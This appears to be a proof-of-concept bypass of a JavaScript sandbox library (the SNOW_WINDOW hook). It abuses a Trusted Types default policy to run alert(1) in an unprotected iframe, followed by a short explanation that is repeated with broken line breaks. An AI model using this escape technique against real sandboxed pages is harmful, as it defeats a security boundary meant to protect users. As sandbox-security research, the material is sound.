var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe srcdoc="
<meta http-equiv='Content-Security-Policy' content="require-trusted-types-for 'script';">.
<script>
trustedTypes.createPolicy('default', { createHTML: s=>s, createScript: function (s) { return ''; } });
setTimeout(()=>frames[0].alert(1),100);
</script>
<iframe src=\'javascript:alert(1)\'</iframe>"></iframe>
`
The idea was taking advantage of trusted types default policy to break the "atomicity" of the hooks (i.e., the malicious policy will get called after the hooks, but before the actual HTML/script assignment). There are several different directions, here I just use the createScript to break the internal SNOW_WINDOW(this) in the javascript: URI :)
The idea was taking advantage of trusted types default policy to break the "atomicity" of the hooks (i.e., the malicious policy will get called after the hooks, but before the actual HTML/script assignment). There are several different directions, here I just use the createScript to break the internal
SNOW_WINDOW(this)
in thejavascript:
URI :)